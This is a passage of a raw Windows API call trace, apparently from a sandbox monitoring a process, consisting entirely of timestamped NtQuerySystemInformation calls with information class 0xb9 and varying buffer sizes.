SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd368, Length=0x58, ResultLength=0x0) [0229.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x58, ResultLength=0x0) [0229.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x28, ResultLength=0x0) [0229.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0229.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0229.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x20, ResultLength=0x0) [0229.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0229.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0229.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0229.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x20, ResultLength=0x0) [0229.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x58, ResultLength=0x0) [0229.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x28, ResultLength=0x0) [0229.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0229.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0229.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf10, Length=0x20, ResultLength=0x0) [0229.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x20, ResultLength=0x0) [0229.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x20, ResultLength=0x0) [0229.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x20, ResultLength=0x0) [0229.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x20, ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x58, ResultLength=0x0) [0229.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x28, ResultLength=0x0) [0229.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0229.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0229.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x20, ResultLength=0x0) [0229.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0229.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0229.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0229.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x20, ResultLength=0x0) [0229.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x58, ResultLength=0x0) [0229.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0229.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0229.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0229.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0229.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0229.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x28, ResultLength=0x0) [0229.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0229.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0229.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0229.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0229.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0229.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0229.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0229.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce30, Length=0x20, ResultLength=0x0) [0229.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce30, Length=0x20, ResultLength=0x0) [0229.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce30, Length=0x20, ResultLength=0x0) [0229.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0229.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0229.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0229.543] NtQuerySystemInformation 